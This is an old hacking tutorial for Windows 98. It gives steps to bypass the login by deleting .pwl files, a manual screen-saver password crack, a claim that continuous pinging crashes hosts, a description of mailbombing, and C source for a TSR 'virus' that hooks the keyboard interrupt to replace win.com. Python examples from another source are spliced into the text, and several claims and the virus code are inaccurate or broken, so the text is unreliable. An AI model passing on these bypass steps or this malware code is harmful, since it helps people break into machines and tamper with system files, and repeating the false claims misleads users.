Hacking

4. Windows torn apart:


Hacking Windows Login Passwords:
To hack the windows login password, reboot and wait for the message:
Starting Windows 98
When you see this on the screen, press F8. The boot menu will come up. Select option 7 to boot into Dos. Then go to the windows directory by typing
C:\>cd windows
Then rename all files with the extension .pwl by typing the following command:
C:\windows>ren *.pwl *.xyz
Or delete them by typing
C:\windows>del *.pwl
Now when the windows password login pops up, you can type anything in the place where the password has to be entered. Windows just takes it as the original password.
If the F8 key is disabled, then boot from a floppy and delete *.pwl from the windows directory.

There is a way of disabling the F8 key. Simply follow these steps.
1. Find the file msdos.sys, which is in C:\. Since this is a hidden system file, you will have to make it writeable by changing its attributes, by typing
C:\>attrib -s -h -r msdos.sys
2. Open msdos.sys in WordPad.
3. You will see something that looks like this:
; FORMAT
[Paths]
WinDir=C:\WINDOWS
WinBootDir=C:\WINDOWS
HostWinBootDrv=C
[Options]
BootMenu=0(default)
BootMulti=1
BootGui=1
DoubleBuffer=1
AutoScan=1
WinVer=4.10.1998
;
To disable the function keys during boot up, directly below [Options] insert the following line:
BootDelay=0
4. Since msdos.sys is an important system file, change its attributes back to read only, hidden and system by typing
C:\>attrib +s +h +r msdos.sys

Changing Windows Visuals:

Changing windows logo:
If your computer is configured to work normally, then a boring blue screen saying Welcome to Windows 98 will welcome you every time you boot your system. The following procedure will change it to the way the user wants. Look for the file named logo.sys. As it is a system file it is kept hidden. Change its attributes by doing the following:
Go to MSDOS and type the following:
C:\windows>attrib -s -h -r logos.sys
Now, do the following steps to get the welcome screen you want:
Step 1. Open MSPaint
Step 2. From the File Menu select Open
Step 3. Open c:\Windows\logos.sys
Step 4. This opens the boring screen. You can change it and save it as logos.sys, as shown in fig(a)
Step 5. At the command prompt type attrib +s +h +r logos.sys

Changing Shut Down Screen:
Go to the command prompt and make logow.sys writable. Open it in Paint, change what you want and save it as logow.sys. This changes the boring shut down screen.

Hacking windows screen saver password:
This is an interesting hack and not many people know about it. It requires no canned hacking tool; we will crack the password manually.
If a screen saver is password protected, then it does not allow us to do anything on the system until we enter the password. Here, not even CTRL+ALT+DEL works.
To begin with, Windows stores the encrypted password in a file called user.dat in the Windows directory. Test the coding scheme on your own system by entering the letters whose codes you want to know. Now you are armed with the letters and their corresponding codes, and you are one step from breaking any password.
For example, let the password be DOPE. Then the encryption scheme is:
D = 0C
O = A1
P = 26
E = 58
To break this password, open the user.dat file and extract the corresponding codes by comparing them with the codes we have.

Customize your Operating System by Editing Explorer.exe:

Do not try to edit explorer.exe in Dos while running windows. It is a read only file and windows will not allow you to edit it.
Restart the computer in MSDOS. Once you get your Dos prompt, go to the windows directory by typing
C:\>cd windows
Once you are in the windows directory, open the file explorer.exe in the MSDOS editor, i.e. type
C:\windows>edit /70 explorer.exe
The screen will look full of weird characters, something in machine language. Actually, each symbol has a numeric value that you can see at the bottom right of the screen at VALUE:

Lines 2334 to 2348 deal with what appears when you click the Start button. You can change the name of Shut Down to any name, even Programs to Hackings.
Then at line 2390 comes a very interesting part. This line lets us change the text on the START button to anything we want; you can have your name on the START button even if your name is 132 letters long!!!
If you look carefully at LINE 2390 you will find that a clubs symbol precedes S t a r t. If you move the cursor over the club you will find that its value is 5. So the text after the clubs symbol, in this case S t a r t, has to be 5 letters. Now, if you want to replace Start with something like Stop, which is 4 letters, then search for a symbol whose numeric value is 4 and paste it over the clubs symbol.

5. Registry Hacking:
Structure of Registry:
The registry is a hierarchical database that contains virtually all information about your computer's configuration. The registry editor is a utility with the filename regedit.exe that allows you to see, search, modify and save the registry database of windows.
The registry editor is divided into two sections. In the left one there is the hierarchical structure of the database; in the right one there are the values.

The principal keys of the registry are:
HKEY_LOCAL_MACHINE:
This key contains all hardware, application and services information. Much of the hardware information is updated automatically while the computer is booting. The data stored in this key is shared with every user.
HKEY_CLASSES_ROOT:
This key is an alias of the branch HKEY_LOCAL_MACHINE\Software\Classes and contains OLE, drag and drop, shortcut and file association information.
HKEY_CURRENT_CONFIG:
This key is also an alias, of HKEY_LOCAL_MACHINE\Config, with the current computer configuration.
HKEY_DYN_DATA:
Some information in the registry changes frequently, so windows maintains part of the registry in memory instead of on the hard disk. For example, it stores computer performance data here.
HKEY_USERS:
This contains the information about the different users existing on the system.

HKEY_CURRENT_USER:
This keeps track of the current user of the system.

Disabling display of drives in My Computer:
To disable the display of local drives when you click My Computer, go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Now, in the right pane create a new DWORD item and name it NoDrives. Modify its value and set it to 3FFFFFF. Press F5 to refresh. When you click on My Computer, no drives will be shown. To enable the display of drives in My Computer again, simply delete this DWORD item.
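The NoDrives value is a bitmask with one bit per drive letter (bit 0 is A:, bit 25 is Z:), which is why 3FFFFFF, all 26 bits set, hides every drive. As an added example that is not from the original page, the Python below encodes a chosen set of drive letters into that DWORD, decodes a mask back into letters, and renders the value as a REGEDIT4 .reg fragment; the function names are my own.

```python
# Added example (not from the original page): encode and decode the Explorer
# NoDrives policy bitmask.  Bit 0 = A:, bit 1 = B:, ... bit 25 = Z:.  The value
# 3FFFFFF used on the page sets all 26 bits, so every drive disappears.
from string import ascii_uppercase

REG_PATH = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"


def nodrives_mask(drives):
    """Return the NoDrives DWORD that hides exactly the given drive letters."""
    mask = 0
    for d in drives:
        idx = ascii_uppercase.index(d.upper()[0])  # 'A' -> 0 ... 'Z' -> 25
        mask |= 1 << idx
    return mask


def hidden_drives(mask):
    """Decode a NoDrives DWORD back into the list of hidden drive letters."""
    return [ascii_uppercase[i] for i in range(26) if (mask >> i) & 1]


def reg_fragment(mask):
    """Render the value as a Windows 9x style REGEDIT4 .reg fragment (REG_DWORD, hex)."""
    return "\n".join([
        "REGEDIT4",
        "",
        f"[{REG_PATH}]",
        f'"NoDrives"=dword:{mask:08x}',
        "",
    ])


if __name__ == "__main__":
    print(hex(nodrives_mask(ascii_uppercase)))   # the page's 3FFFFFF: hide all drives
    print(hidden_drives(0x3FFFFFF))              # A .. Z
    print(reg_fragment(nodrives_mask("AD")))     # hide only A: and D: (bits 0 and 3)
```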

CLSID Folders:
The folders like Control Panel, Dial up Networking etc. are system folders. Each system folder has a unique CLSID key or Class Id, which is a value.
The following are the CLSID values of the most commonly used icons:
My Briefcase: {85BBD920-42A0-1069-A234-08002B30309D}
My Computer: {20D04FE0-3AEA-1069-A2D8-08002B303098}
Recycle Bin: {645FF040-5081-101B-9F08-00AA002F954E}
To change the name of the Recycle Bin folder go to

HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
In the right pane change the default to whatever name you want.
To delete the Recycle Bin, go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\namespace
and delete the key {645FF040-5081-101B-9F08-00AA002F954E}.
To remove the Find option from the Start Menu, go to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Right click on the right pane and select New, DWORD value. Name it NoFind. Double click the newly created DWORD to edit its value and enter 1 as its value. This will disable the FIND option of the Start Menu.
To restore the FIND command, simply delete the DWORD value.

6. Peeping the Internet:


Ping:
Ping is a part of the ICMP protocol, i.e. the Internet Control Message Protocol, which is used to troubleshoot TCP/IP networks.

Ping is a command which sends out a datagram to the specified host. If this host is alive, i.e. turned on, it sends out a reply, echoing back the same datagram. If the datagram that returns to your computer is the same datagram that was sent, then it means that the host is alive. So ping is a command that allows you to check whether a host is alive or not. It can also be used to calculate the amount of time taken for a datagram to reach the host.
It is so deadly that it can be used to ping a hostname perpetually, which may even cause the host to crash. What happens is that when a host receives a ping, it allocates some of its resources to attend to, or echo back, the datagram. Now if you ping a host perpetually, then a time will come when all the resources of the host are used up and the host either hangs or restarts.
You can even ping yourself. The IP 127.0.0.1 is the local host. This means that when you connect to 127.0.0.1, you actually connect to your own machine. So to ping yourself perpetually, issue the following command:
ping -t 127.0.0.1
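The exchange described above, as an added example that is not part of the original page: the Python below builds an ICMP echo request (type 8), the echo reply (type 0) that a live host returns with the same identifier, sequence number and data, and the comparison that decides the host is alive. It works purely on constructed byte strings offline, and the function names are my own.

```python
# Added example (not from the original page): the ping request/reply exchange
# on raw ICMP bytes.  Nothing is sent on the wire; both sides are built here.
import struct

ECHO_REQUEST, ECHO_REPLY = 8, 0   # ICMP type values for echo request / echo reply


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (odd trailing byte padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(kind: int, ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP header (type, code, checksum, identifier, sequence) plus the payload."""
    header = struct.pack("!BBHHH", kind, 0, 0, ident, seq)   # checksum field zeroed
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", kind, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes):
    """Return (type, ident, seq, payload), or None if too short or checksum fails."""
    if len(packet) < 8 or icmp_checksum(packet) != 0:   # valid packet sums to zero
        return None
    kind, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return kind, ident, seq, packet[8:]


def host_reply(request: bytes) -> bytes:
    """What an alive host does: echo the datagram back as type 0, same id/seq/data."""
    parsed = parse_echo(request)
    if parsed is None or parsed[0] != ECHO_REQUEST:
        raise ValueError("not a valid echo request")
    _, ident, seq, payload = parsed
    return build_echo(ECHO_REPLY, ident, seq, payload)


def is_alive(request: bytes, reply: bytes) -> bool:
    """The page's test: the reply must carry back exactly what was sent."""
    sent, got = parse_echo(request), parse_echo(reply)
    return (sent is not None and got is not None
            and got[0] == ECHO_REPLY and sent[1:] == got[1:])


if __name__ == "__main__":
    req = build_echo(ECHO_REQUEST, 0x1234, 1, b"abcdefghijklmnop")   # constructed sample
    print(is_alive(req, host_reply(req)))                  # True: host echoed it back
    print(is_alive(req, host_reply(req)[:-1] + b"?"))      # False: corrupted reply
```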

Tracert:
When you type hotmail.com in your browser, your request passes through a large number of computers before reaching hotmail.com. Or when you log in to your shell account and type the password, this password passes through a large number of computers before reaching the shell account server. To find the list of servers the password or request passes through, one can use the TRACERT command.

Mailbombing:
Mail bombing means sending a huge number of e-mails to a single e-mail account so that the maximum space of the account is filled up, the owner of the account cannot receive any important e-mails, and it becomes difficult for the user to read existing e-mails.
All e-mail accounts have a maximum space limit. For example, Yahoo has a space limit of 4MB. Now if this maximum space is filled up then no new messages can come in and the mail server bounces any new messages that arrive; so, if the victim who has been mailbombed is expecting any new important messages, he can pretty much kiss them goodbye.

7. Towards Cracking:
Virus:
Here we have sample C code to illustrate a virus that cracks win.com.
The idea is to take over the IVT (interrupt vector table) and alter the entry corresponding to interrupt number 0x09, the keyboard interrupt, so that it points to our user defined program fragment. When any key is pressed, control transfers to our code, where we unload command.com using the system("exit") call to shut down the computer.

/* tsr.c: 16-bit DOS TSR (Turbo C) that hooks the keyboard interrupt */
#include <stdio.h>
#include <stdlib.h>
#include <dos.h>        /* getvect, setvect, keep */
#include <process.h>
#define INTR 0x09       /* keyboard hardware interrupt */

void interrupt (*oldhandler)();

void interrupt handler()
{
    system("exit");
    /* check the size of win.com; if it is already our replacement, do nothing */
    FILE *fp = fopen("c:\\windows\\win.com", "rb");
    fseek(fp, 0, SEEK_END);
    long l = ftell(fp);
    if (l == 123)
    {
        fclose(fp);
        return;
    }
    /* swap the real win.com for mywin.com */
    system("cd c:\\windows");
    system("ren win.com oldwin.com");
    system("ren mywin.com win.com");
    fclose(fp);
}

int main(void)
{
    /* save old interrupt vector */
    oldhandler = getvect(INTR);
    /* install the new interrupt handler */
    setvect(INTR, handler);
    /* terminate and stay resident, keeping 500 paragraphs of memory */
    keep(0, 500);
    return 0;
}

/* MyWin.cpp: the replacement win.com, which launches the TSR */
#include <stdio.h>
#include <process.h>

int main(void)
{
    int result;
    result = spawnl(P_WAIT, "tsr.exe", "tsr.exe", NULL);
    if (result == -1)
    {
        perror("error from spawnl");
    }
    return 0;
}

8. Pros & Cons:
Pros:
1. Fortifies security in a devious fashion
2. Checks for loop holes in our application
3. Calls for high thinking and analyzing capability
4. Explores the uncovered
Cons:
1. Risk of getting misunderstood
2. Risk in loss of sensitive data

9. Conclusion:
In conclusion, I would say that hacking is an activity beyond the ordinary.
All hackers know that an important hacker ethic is never to delete files or cause any damage. Make good use of this additional bit of knowledge adorning your thoughts.